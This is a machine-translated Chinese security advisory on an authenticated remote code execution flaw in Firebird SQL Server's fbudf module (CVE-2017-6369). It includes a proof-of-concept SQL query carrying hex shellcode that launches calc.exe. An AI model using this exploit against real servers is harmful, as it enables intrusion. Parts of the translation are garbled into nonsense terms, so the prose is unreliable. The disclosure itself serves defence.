(R1)火鸟fbudf模块通过身份验证的远程代码执行

在调查cve - 2017 - 6369火鸟SQL Server,站得住脚的发现经过身份验证的远程代码执行漏洞。因为存在安全漏洞火鸟允许用户定义外部函数不匹配的原始定义入口点。

例如,文档string2blob表明它是定义是这样的:

声明外部函数string2blob VARCHAR(300)描述符,团返回参数2 ENTRY_POINT‘string2blob MODULE_NAME fbudf”

然而,经过身份验证的用户可以声明一个第二个这样的外部函数:

声明声明外部函数a6 VARCHAR(300)描述符,VARCHAR(400)描述符返回整数ENTRY_POINT‘string2blob MODULE_NAME fbudf”

你可以看到原件string2blob有一个团作为第二个参数,第二个定义VARCHAR (400)作为第二个参数。通过精心设计VARCHAR在一个查询,经过身份验证的攻击者可以覆盖blob_put_segment函数指针的blobcallback结构。string2blob最终将调用重写函数指针导致远程代码执行系统。

我们写了一个概念证明使用IE8在这个虚拟机(x86)和火鸟SQL Server 2.5.7 32位版本。持久性有机污染物calc.exe概念的证明。

SQL >选择a6((从rdb选择x的31 db648b7b308b7f0c8b7f1c8b47088b77208b3f807e0c3375f289c703783c8b577801c28b7a2001c789dd8b34af01c645813e4372656175f2817e086f63657375e98b7a2401c7668b2c6f8b7a1c01c78b7caffc01c789d9b1ff53e2fd6863616c6389e252525353535353535253ffd7 $数据库),(选择x的11111111 c8fd8503 rdb数据库)美元)从rdb数据库;